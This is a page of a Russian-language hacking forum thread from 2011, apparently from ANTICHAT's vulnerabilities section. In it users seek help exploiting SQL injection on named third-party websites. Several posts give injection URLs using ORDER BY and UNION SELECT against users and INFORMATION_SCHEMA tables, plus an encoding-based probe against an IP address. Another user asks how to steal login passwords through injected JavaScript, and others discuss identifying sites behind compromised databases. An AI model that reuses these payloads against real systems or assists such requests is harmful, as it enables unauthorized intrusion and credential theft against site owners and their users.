HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16151  
Старый 18.01.2011, 17:51
silverboy440
Новичок
Регистрация: 19.11.2008
Сообщений: 1
Провел на форуме:
42825

Репутация: 0
По умолчанию

http://oldtitan.ja.org/challenge.php?page=rules&id=1'+order+by+47+--+

http://oldtitan.ja.org/challenge.php?page=rules&id=1'+union+all+select+nu ll,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+users+--+

не получается для

http://oldtitan.ja.org/area_admin.php?=id3

плз хэлп, возможно ли что нить сделать?
 
Ответить с цитированием

  #16152  
Старый 18.01.2011, 19:12
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Всем привет!

На сайте получил возможность добавлять/изменять новости... возможно ли при помощи js(или еще чего) перехватить какнить вводимые логин и пасс из формы входа???

Куки в принципе не интересуют! ..нужен сам пасс, мб к мылу подойдет и т.п.
 
Ответить с цитированием

  #16153  
Старый 18.01.2011, 21:16
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от tapapax  
tapapax said:
Привет. Столкнулся с проблемой: не могу раскрутить инъекцию, т.к. на серве стоит 3й(!!!) мускуль (3.23.55), а как я понял, union'ом там еще не пахло. Попробовал также вложенный запрос, не сработал. Есть ли другие варианты?
http://www.securitylab.ru/contest/212101.php

https://rdot.org/forum/showthread.php?t=32

https://rdot.org/forum/showthread.php?t=503
 
Ответить с цитированием

  #16154  
Старый 18.01.2011, 21:29
silverboy440
Новичок
Регистрация: 19.11.2008
Сообщений: 1
Провел на форуме:
42825

Репутация: 0
По умолчанию

вот еще накапал...

http://oldtitan.ja.org/challenge.php?page=rules&id=22'+union+all+select+1 ,2,3,'str1','str2',null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null+from+INFORMATION_SCHE MA.COLUMNS+--+

http://oldtitan.ja.org/area_admin.php?=id3 без успеха...
 
Ответить с цитированием

  #16155  
Старый 18.01.2011, 23:10
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"

помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал.
 
Ответить с цитированием

  #16156  
Старый 19.01.2011, 08:49
GIG
Новичок
Регистрация: 17.04.2010
Сообщений: 16
Провел на форуме:
84688

Репутация: 0
По умолчанию

В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
 
Ответить с цитированием

  #16157  
Старый 19.01.2011, 09:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от GIG  
GIG said:
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
в форумах я ищу название форумов и топиков, потом по гуглу ищу, в других кмс таким же макаром ищу что нибудь индивидуальное для сайта что бы ссузить список поиска, еще вывожу мыло админа, часто мыла на том же домене что и сайт...вариантов много...
 
Ответить с цитированием

  #16158  
Старый 19.01.2011, 13:59
viziter-msk
Guest
Сообщений: n/a
Провел на форуме:
524

Репутация: 0
По умолчанию

а есть у кого нить пособие как искать и с чего начинать при поиске XSS
 
Ответить с цитированием

  #16159  
Старый 19.01.2011, 14:04
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от GIG  
GIG said:
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
/showthread.php?p=2343252

Цитата:
Сообщение от viziter-msk  
viziter-msk said:
а есть у кого нить пособие как искать и с чего начинать при поиске XSS
какие способы хочешь? в статях все нормально написано и описано.. если не понял- читай еще раз

не понимаю я вас...
 
Ответить с цитированием

  #16160  
Старый 19.01.2011, 15:14
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
Отправить сообщение для zlo12 с помощью ICQ
По умолчанию

как подобные скули крутить? и чем вызвано сиё странное поведение?



http://www.razda4a.ru/?news=12+order+by+5--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ